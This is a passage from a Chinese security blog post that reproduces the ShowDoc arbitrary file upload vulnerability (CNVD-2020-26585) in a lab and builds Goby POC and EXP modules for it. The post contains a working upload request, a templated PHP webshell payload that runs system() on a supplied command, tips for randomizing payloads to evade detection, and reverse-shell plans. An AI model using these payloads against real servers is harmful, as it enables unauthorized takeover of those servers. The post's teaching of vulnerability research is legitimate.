

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="最初只是简单的搭建环境，拿着公开的POC复现漏洞。然后想着学学Goby如何编写POC&amp;EXP，先拿GUI的形式编写，但是逐渐发现很多想法都满足不了，于是尝试Go语言编写。但也不满足于此，想去探究漏洞成因遂代码审计，最后对漏洞成因进行追溯源头，得出结论！">
  <meta name="author" content="corp0ra1">
  <meta name="keywords" content="">
  
  <title>记一次不停自我追问式的学习 - corp0ra1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"corp0ra1.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":80,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"a1a4ccab78dfa522556928ac810fa739","google":"G-4X9XV0H0D5","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="corp0ra1's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 60vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
    <div class="container">
        <a class="navbar-brand" href="/">&nbsp;<strong>Corp0ra1's Blog</strong>&nbsp;</a>

        <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

        <!-- Collapsible content -->
        <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav ml-auto text-center">
                
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
                                        </li>
                                        
                                            
                                                
                                                    <li class="nav-item" id="search-btn">
                                                        <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
                                                    </li>
                                                    
                                                        
                                                            <li class="nav-item" id="color-toggle-btn">
                                                                <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
                                                            </li>
                                                            
                                                                <li class="nav-item">
                                                                    <a class="nav-link" href="/atom.xml">
                                                                        <i class="iconfont icon-rss"></i>
                                                                    </a>
                                                                </li>
            </ul>
        </div>
    </div>
</nav>
    <div class="banner" id="banner" parallax=true
         style="background: url('/img/tesla.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="记一次不停自我追问式的学习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-06-25 00:30" pubdate>
        2021年6月25日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      78
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

    <div class="container-fluid nopadding-x">
        <div class="row nomargin-x">
            <div class="d-none d-lg-block col-lg-2"></div>
            <div class="col-lg-8 nopadding-x-md">
                <div class="container nopadding-x-md" id="board-ctn">
                    <div class="py-5" id="board">
                        <article class="post-content mx-auto">
                            <!-- SEO header -->
                            <h1 style="display: none">
                                记一次不停自我追问式的学习
                            </h1>
                            <div class="markdown-body">
                                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最初只是简单的搭建环境，拿着公开的POC复现漏洞。然后想着学学Goby如何编写POC&amp;EXP，先拿GUI的形式编写，但是逐渐发现很多想法都满足不了，于是尝试Go语言编写。但也不满足于此，想去探究漏洞成因遂代码审计，最后对漏洞成因进行长达8年的溯源，得出结论！</p>
<h1 id="1-准备工作"><a href="#1-准备工作" class="headerlink" title="1. 准备工作"></a>1. 准备工作</h1><h2 id="1-1-漏洞速览"><a href="#1-1-漏洞速览" class="headerlink" title="1.1 漏洞速览"></a>1.1 漏洞速览</h2><p>漏洞描述：Showdoc存在文件上传漏洞，攻击者可以利用漏洞获取服务器权限。</p>
<p>漏洞影响：ShowDoc &lt; V2.8.3</p>
<p>漏洞参考：<a target="_blank" rel="noopener" href="https://www.cnvd.org.cn/flaw/show/CNVD-2020-26585">https://www.cnvd.org.cn/flaw/show/CNVD-2020-26585</a></p>
<h2 id="1-2-环境搭建"><a href="#1-2-环境搭建" class="headerlink" title="1.2 环境搭建"></a>1.2 环境搭建</h2><p>系统：Windows10</p>
<p>工具：PHPStudy2016，VScode，Goby，Burp</p>
<p>环境：showdoc-V2.6.7  <a target="_blank" rel="noopener" href="https://github.com/star7th/showdoc">https://github.com/star7th/showdoc</a></p>
<h2 id="1-3-POC"><a href="#1-3-POC" class="headerlink" title="1.3 POC"></a>1.3 POC</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /index.php?s=<span class="hljs-regexp">/home/</span>page/uploadImg HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>:<span class="hljs-number">81</span><br>Content-Type: multipart/form-data; boundary=---------------------------<span class="hljs-number">346031065719027724703329952952</span><br>Content-Length: <span class="hljs-number">252</span><br><span class="hljs-attr">Connection</span>: close<br><br>-----------------------------<span class="hljs-number">346031065719027724703329952952</span><br>Content-Disposition: form-data; name=<span class="hljs-string">&quot;editormd-image-file&quot;</span>; filename=<span class="hljs-string">&quot;1.&lt;&gt;php&quot;</span><br>Content-Type: text/plain<br><br>&lt;?php phpinfo();?&gt;<br>-----------------------------<span class="hljs-number">346031065719027724703329952952</span>--<br></code></pre></td></tr></table></figure>

<h2 id="1-4-复现"><a href="#1-4-复现" class="headerlink" title="1.4 复现"></a>1.4 复现</h2><p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="2-利用Goby的GUI编写POC-amp-EXP"><a href="#2-利用Goby的GUI编写POC-amp-EXP" class="headerlink" title="2. 利用Goby的GUI编写POC&amp;EXP"></a>2. 利用Goby的GUI编写POC&amp;EXP</h1><h2 id="2-1-编写POC"><a href="#2-1-编写POC" class="headerlink" title="2.1 编写POC"></a>2.1 编写POC</h2><h3 id="2-1-1-填入基本内容"><a href="#2-1-1-填入基本内容" class="headerlink" title="2.1.1 填入基本内容"></a>2.1.1 填入基本内容</h3><p>可以手动输入，但是由于该漏洞有CNVD编号，于是考虑从命令行导入</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-comment">//在goby的golib目录下的goby-cmd文件，也可以-h解锁更多操作</span><br>goby-cmd -mode genpoc -CNVDID CNVD-<span class="hljs-number">2020</span>-<span class="hljs-number">26585</span> -exportFile exploits\user\CNVD-<span class="hljs-keyword">export</span>.go<br><span class="hljs-comment">//导出文件在goby的\golib\exploits\user目录下</span><br></code></pre></td></tr></table></figure>

<p>已知BUG：</p>
<ol>
<li>通过命令行导出的文件需要手动加上指纹：<code>&quot;GobyQuery&quot;: &quot;app=\&quot;showDoc\&quot;&quot;</code> ，才可以导入进Goby，不然导入不进去，会报错（在log中可以看到报错信息）</li>
<li>通过命令行导出的文件导入POC时，测试界面会出现白屏bug，因为ScanSteps中缺少<code>&quot;SetVariable&quot;: []</code> 字段，添加即可。</li>
</ol>
<blockquote>
<p>不想拘泥于手动，虽然导入遇到了不少的麻烦，但是总归是需要尝试的，后续Goby团队也会改进的。</p>
</blockquote>
<h3 id="2-2-2-发出请求"><a href="#2-2-2-发出请求" class="headerlink" title="2.2.2 发出请求"></a>2.2.2 发出请求</h3><p>简单的将POC内容复制粘贴进对应字段即可</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%201.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="2-2-3-验证响应"><a href="#2-2-3-验证响应" class="headerlink" title="2.2.3 验证响应"></a>2.2.3 验证响应</h3><p>参考Goby<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/PoC-writing-suggestions#%E5%87%86%E7%A1%AE%E6%80%A7">《PoC writing suggestions》中的准确性</a>：增加检测关键字、特殊符号、响应包中独一无二的特征，以提高其准确性。</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%202.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="2-2-4-编写POC的Tips"><a href="#2-2-4-编写POC的Tips" class="headerlink" title="2.2.4 编写POC的Tips"></a>2.2.4 编写POC的Tips</h3><ol>
<li>修改POC之后记得保存后，再进行单IP测试</li>
<li>由于Goby可能因为缓存等机制，导致修改POC并保存之后，即使发包也是未修改之前的包，需要返回漏洞管理界面再重新载入POC才行</li>
<li>由于上述载入载出步骤较为麻烦，我采用<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#%E6%BC%8F%E6%B4%9E%E6%A8%A1%E6%9D%BF%E8%84%9A%E6%89%8B%E6%9E%B6%E4%BD%BF%E7%94%A8%E4%BB%8B%E7%BB%8D">Goby脚手架</a>的方式，在VSCode修改代码的同时在CMD中测试： <code>goby-cmd -mode runpoc -operation scan -pocFile exploits\user\a.go -target 127.0.0.1</code></li>
<li>脚手架的方式不支持burp代理调试。如果需要对POC进行代理调试的话，推荐依然使用GUI的方法，详见<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/IeftOSV29DbDgeClqXqnkg">《Json 编写 PoC&amp;EXP 遇到的那些坑》</a></li>
</ol>
<h2 id="2-2-编写EXP"><a href="#2-2-编写EXP" class="headerlink" title="2.2 编写EXP"></a>2.2 编写EXP</h2><p>总体思路同上POC的问题，只不过将上传的验证性文件切换为一句话、菜刀等类型木马文件，然后在浏览器中访问对应连接即可。</p>
<p>仔细查看<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#exp-%E7%BC%96%E5%86%99">官方文档的EXP部分</a> ，实际操作步骤如下：</p>
<ol>
<li>将 <code>HasExp</code> 字段设置为 true</li>
<li>在POC界面编写EXP后，在编辑器中将<code>ScanSteps</code>对应代码复制粘贴到<code>ExploitSteps</code> </li>
<li>上传文件内容更改为冰蝎马，上传一句话木马同理</li>
<li>直接将返回的链接扔到冰蝎里面连接即可。</li>
</ol>
<p>已知问题：</p>
<ol>
<li>GobyGUI目前暂不支持EXP用GUI编写，借用POC界面编写后，在编辑器中将<code>ScanSteps</code>对应代码复制粘贴到<code>ExploitSteps</code> </li>
<li>抓包问题：pcap模式扫描127.0.0.1无IP存活，但是socket模式下可以扫127.0.0.1</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%203.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="2-3-进一步优化POC-amp-EXP"><a href="#2-3-进一步优化POC-amp-EXP" class="headerlink" title="2.3 进一步优化POC&amp;EXP"></a>2.3 进一步优化POC&amp;EXP</h2><h3 id="2-3-1-自动删除上传文件"><a href="#2-3-1-自动删除上传文件" class="headerlink" title="2.3.1 自动删除上传文件"></a>2.3.1 自动删除上传文件</h3><p>在公网测试的时候，发现一个很不好的现象：某站点上存在大量这类一句话木马。</p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%204.png" srcset="/img/loading.gif" lazyload></p>
<p>参考Goby<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/PoC-writing-suggestions#%E6%97%A0%E5%AE%B3%E6%80%A7">《PoC writing suggestions》的无害性</a>： 我们需要将上传的文件进行删除。虽然第一次第二次很麻烦，但是优秀是需要形成习惯的。</p>
<p>问题：</p>
<ol>
<li>如何删除上传文件？PHP中可以利用<code>unlink()</code>函数来删除文件</li>
<li>如何触发<code>unlink()</code>函数？连续发出两次请求。第一次请求用于上传文件，第二次请求用于触发<code>unlink()</code>函数删除文件</li>
<li>如何获取第二次请求的链接？第一次的返回包中有返回绝对路径，且Goby可以基于正则提取第一次请求的响应，并在第二次利用，详见Goby<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#json-%E5%BD%95%E5%85%A5%E6%BC%8F%E6%B4%9E%E9%80%BB%E8%BE%91%E6%89%8B%E5%86%8C">《POC编写指南之JSON 录入漏洞逻辑手册》</a></li>
<li>如何编写正则？先百度正则语法，再用<a target="_blank" rel="noopener" href="https://regex101.com/">regex101平台</a>进行测试</li>
<li>如何去掉链接<code>/\</code>这些符号？化繁为简，分析文件路径组成：Hostinfo+Public/Uploads+日期+随机文件名，后两个变量分两次正则提取，然后整体拼接即可</li>
</ol>
<p>问题解决了，步骤自然清晰：</p>
<ol>
<li>在上传的文件末尾增加<code>unlink()</code>函数</li>
<li>在第一次请求的正则部分增加自定义变量<code>date</code>和<code>file</code></li>
<li>在Goby中添加第二次请求的URL中使用这两个变量<code>/Public/Uploads/&#123;&#123;&#123;date&#125;&#125;&#125;/&#123;&#123;&#123;file&#125;&#125;&#125;</code></li>
<li>如果第二次响应为200即可算作成功</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%205.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%206.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="2-3-2-提高POC的准确性"><a href="#2-3-2-提高POC的准确性" class="headerlink" title="2.3.2 提高POC的准确性"></a>2.3.2 提高POC的准确性</h3><p><strong>问题</strong>：既然可以发出第二次请求，不仅可以触发<code>unlink()</code>函数，是否可以考虑增加一些<code>echo</code>操作进一步提高POC的准确性？</p>
<p><strong>思路：</strong>在php文件中echo一段随机数，然后第二次请求在响应判断的时候，不仅只是判断响应为200，也匹配是否这段随机数？</p>
<p>问题解决了，步骤自然清晰。虽然第一次返回匹配到success等字段即可验证POC成功，第二步echo再一下有些多余，但是我想以后肯定某个地方需要用的，先学着。</p>
<p><strong>已知问题</strong>：由于目前Goby GUI并不支持随机数，所以只能手动输入一个固定数然后进行判断。(Goby团队后续会在GUI中增加随机数选项)</p>
<h3 id="2-3-3-优化一句话木马"><a href="#2-3-3-优化一句话木马" class="headerlink" title="2.3.3 优化一句话木马"></a>2.3.3 优化一句话木马</h3><p><strong>新需求</strong>：上传冰蝎类的马简单，上传一句话木马类似，但是之前的方式需要在浏览器或冰蝎中打开链接进行操作，有些繁琐。针对一句话木马如果只想在GobyGUI中操作，不需要新打开浏览器中转，肯定更优雅更简洁，那么如何操作？</p>
<p><strong>需求拆解</strong>：实现动态一句话木马：①在木马文件中动态插入一句话命令②触发木马文件并获取返回值</p>
<p><strong>问题</strong>：</p>
<ol>
<li>如何在上传文件中动态插入参数？查看文档后发现：Goby提供<code>ExpParams</code> 字段来让用户自定义所需传递参数，且和自定义参数逻辑一样，<code>&#123;&#123;&#123;&#125;&#125;&#125;</code>包裹即可在json任意位置使用该变量，比如<code>&lt;?php system(&quot;&#123;&#123;&#123;cmd&#125;&#125;&#125;&quot;);unlink(); ?&gt;</code>,即可实现一句话木马的操作</li>
<li>如何触发木马并返回值？和前面类似，发送二次请求即可</li>
</ol>
<p>Trick：</p>
<ol>
<li>Goby发包逻辑是每次先POC后EXP，更改EXP后又要重新走一遍扫描流程，很麻烦，有其他直接验证EXP的操作吗？Goby-cmd.exe脚手架中不仅提供scan操作，也提供exploit操作，且exploit操作支持<code>-params &#39;&#123;&quot;cmd&quot;:&quot;whoami&quot;&#125;&#39;</code> 参数。</li>
<li>输入命令<code>goby-cmd -mode runpoc -operation exploit -pocFile exploits\user\a.go -target 127.0.0.1 -params &quot;&#123;\&quot;cmd\&quot;:\&quot;whoami\&quot;&#125;&quot;</code> 即可直接验证EXP。</li>
<li>在cmd模式下验证EXP无误，切换到GUI界面进行扫描，EXP验证成功！</li>
</ol>
<p>已知BUG：</p>
<ol>
<li>发包BUG：在json编写EXP需要连续发两个包的情况下，即使内容编写正确的情况下依然可能会检测失败。需要在ExploitSteps的第一个请求的<code>SetVariable</code> 键中额外加入<code>&quot;output|lastbody&quot;</code>值，才会成功执行第二个请求，进而检测成功。（前面《2.3.1 自动删除上传文件》部分用的仅仅只有POC，没用到EXP这一步，所以未产生BUG）</li>
<li>系统差异BUG：windows下cmd中使用<code>-params &#39;&#123;&quot;cmd&quot;:&quot;whoami&quot;&#125;&#39;</code> 参数会报错<code>invalid character &#39;\&#39;&#39; looking for beginning of value</code> ，改为<code>&quot;&#123;\&quot;cmd\&quot;:\&quot;whoami\&quot;&#125;&quot;</code> 即可</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%207.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master//newBlogPhoto/%E8%AE%B0%E4%B8%80%E6%AC%A1%E4%B8%8D%E5%81%9C%E8%87%AA%E6%88%91%E8%BF%BD%E9%97%AE%E5%BC%8F%E7%9A%84%E5%AD%A6%E4%B9%A0/Untitled%208.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="3-用Go语言编写Goby的POC"><a href="#3-用Go语言编写Goby的POC" class="headerlink" title="3. 用Go语言编写Goby的POC"></a>3. 用Go语言编写Goby的POC</h1><h2 id="3-1-迈出第一步：学用Go语言"><a href="#3-1-迈出第一步：学用Go语言" class="headerlink" title="3.1 迈出第一步：学用Go语言"></a>3.1 迈出第一步：学用Go语言</h2><p>使用GUI时遇到的痛点</p>
<ol>
<li>部分功能缺失：无法使用随机数</li>
<li>缺少DIY需求：对于返回的<code>\/Public\/Uploads\/2021-06-24\/</code> 这类链接无法直接使用，需要手动剔除转移符号</li>
<li>黑盒的未知性：单纯看Json并不能掌控POC后续是怎么被载入和利用的，没有Go代码看起来的直观可控</li>
<li>BUG：不少BUG是因为Json中缺少某个键值，但是判断又很难判断，而Go代码更加可控。</li>
</ol>
<p><strong>困难：</strong></p>
<ol>
<li>上述Poc难吗？不难，不过是发出请求罢了。</li>
<li>不会Go语言怎么办？只是发出一个请求罢了，官方也提供了code demo，只需要改下URI即可完成轮子搭建。详见<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#golang-%E4%BB%A3%E7%A0%81%E5%BD%95%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%89%8B%E5%86%8C">Goby《Vulnerability-writing-guide》之golang-代码录入漏洞手册</a></li>
</ol>
<p>虽然我不会Go，但是因为上面的痛点，还是想克服困难，迈出那第一步。</p>
<p><strong>思路：</strong></p>
<ol>
<li>化繁为简：先写POC，POC写好了，EXP自然写好了。</li>
<li>根据官方的demo，改下POC中的Uri，改下匹配的关键字</li>
<li>测试即可</li>
</ol>
<p>具体不表，造轮子而已。</p>
<h2 id="3-2-进一步：优化POC"><a href="#3-2-进一步：优化POC" class="headerlink" title="3.2 进一步：优化POC"></a>3.2 进一步：优化POC</h2><h3 id="3-2-1-用Go语言实现高级需求"><a href="#3-2-1-用Go语言实现高级需求" class="headerlink" title="3.2.1 用Go语言实现高级需求"></a>3.2.1 用Go语言实现高级需求</h3><p>刚才只是简单的request，想要完成更高的需求，比如前面Json部分对POC的优化</p>
<p><strong>问题</strong>：</p>
<ol>
<li>Go如何实现两次请求达到删除的效果？把发出请求的代码Copy一次，if第一次成功，发出第二次请求，if第二次请求成功，return true。</li>
<li>Go如何使用正则？仔细看<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#exp-%E7%AF%87%E5%86%99">官方文档</a> ，发现其使用了<code>regexp.MustCompile()</code> ，百度搜用法，先新建regex.go文件本地测试，熟悉用法后写入POC测试</li>
<li>Go如何拼接变量？仔细看<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#exp-%E7%AF%87%E5%86%99">官方文档</a> ，发现其使用了<code>fmt.Sprintf(&quot;%s&quot;,var）</code> ，百度搜用法，先新建fmt.go文件本地测试，熟悉用法后写入POC测试</li>
<li>Go如何实现随机数？因为前面GUI编写只能固定数，存在被检测特征，仔细看<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#goutils">官方文档</a> ，发现其使用<code>RandomHexString()</code>生成随机字符串，将固定数替换为随机数变量即可</li>
<li>Go能否将冰蝎上传后返回链接自动优化，而不是手动删除转义符号？既然我们可以通过拼接<code>date</code>和<code>file</code> 形成第二次请求的链接，那么我们也可以冰蝎的输出的内容改为这个链接：<code>expResult.Output =fmt.Sprintf(&quot;%s/Public/Uploads/%s/%s&quot;, expResult.HostInfo, date[1], file[1])</code> </li>
<li>Go能否进一步减少POC特征？前面提及不少网上木马的key为<code>peiqi</code> ,此处也可以利用<code>RandomHexString()</code> 的方式随机生成key，然后在第二次使用后删除该文件，实现一次一密的效果。当然<code>boundary=-------xxxxx</code> 字段也可以通过<code>RandomHexString()</code> 来实现随机性。</li>
</ol>
<p>一步步的查看文档、测试，发现Go语言编写POC&amp;EXP时，内容和行为更可控，也能实现更多自定义需求，需要的Go语言基础也不高，个人觉得比目前GUI的Json编写更加方便。（后续Goby团队会改进GUI并实现这些需要用Go才能满足需求）</p>
<h3 id="3-2-2-执行一句话命令"><a href="#3-2-2-执行一句话命令" class="headerlink" title="3.2.2 执行一句话命令"></a>3.2.2 执行一句话命令</h3><p>Goby红队版本就是执行一句话回显命令的方式</p>
<p><strong>问题：</strong></p>
<ol>
<li>Goby如何自定义参数？前面已经介绍了，在Json中的<code>ExpParams</code> 字段来让用户自定义所需传递参数</li>
<li>Go中如何获取到自定义参数?查看文档发现，可以使用<code>ss.Params[&quot;cmd&quot;].(string)</code>的形式获取参数</li>
<li>Go中如何将自定义参数输入到payload中？利用前面提及的<code>fmt.Sprintf(&quot;%s&quot;,var）</code> 方式</li>
</ol>
<h3 id="3-2-3-更进一步：直接反弹shell"><a href="#3-2-3-更进一步：直接反弹shell" class="headerlink" title="3.2.3 更进一步：直接反弹shell"></a>3.2.3 更进一步：直接反弹shell</h3><p><strong>想法</strong>：既然可以一句话木马，而大部分时间我们生成一句话木马之后第二步就是反弹shell，那么为什么第二次不直接执行反弹shell，难道不比执行一句话命令好？</p>
<p><strong>问题</strong>：</p>
<ol>
<li>如何实现（思路上）？将一句话木马的paylod部分由自定义参数命令的方式直接改为反弹shell的命令即可</li>
<li>如何实现（实际操作）？查看Goby提供<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/Vulnerability-writing-guide#%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8-goby-%E7%9A%84-godserver-%E5%8F%8D%E5%BC%B9-shell">反弹shell的demo</a> 文档，然后魔改为自己需要的即可</li>
<li>为什么可以反弹shell，但是所上传文件无法自动删除，<code>unlink()</code> 函数没触发？因为先执行命令再执行<code>unlink()</code>函数，而前者shell在反弹过程中堵塞了进程，百度后发现可<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/function.exec.php#86329">采取<code>popen()</code>启动子进程</a>的方式。(有趣的是，通过该文档，我了解到可以通过<code>php_uname()</code> 来判断服务器主机系统，进而根据不同系统动态生成payload的操作)（GobyShell只有10分钟存活，也可以保证不会长期驻留服务器进程）</li>
</ol>
<p>我先在本地测试PHP载荷可以实现反弹shell的效果(详见下图)，然后再在Go语言中实现。</p>
<blockquote>
<p>和go0p师傅交流之后，我发现我的想法是错的：我急于直接看到反弹shell的效果，只是因为我的测试环境允许。在实战情况下，目标可能不出网，Godserver服务器可能有一定的问题等等，导致反弹shell不一定在所有环境下都是可以成功的，所以EXP能使用一句话木马回显就用一句话木马回显，其次才考虑其他验证方式。参考<a target="_blank" rel="noopener" href="https://github.com/gobysec/Goby/wiki/PoC-writing-suggestions#%E5%85%B6%E4%BB%96%E5%BB%BA%E8%AE%AE">《GobyPOC编写建议之其他建议》</a></p>
</blockquote>
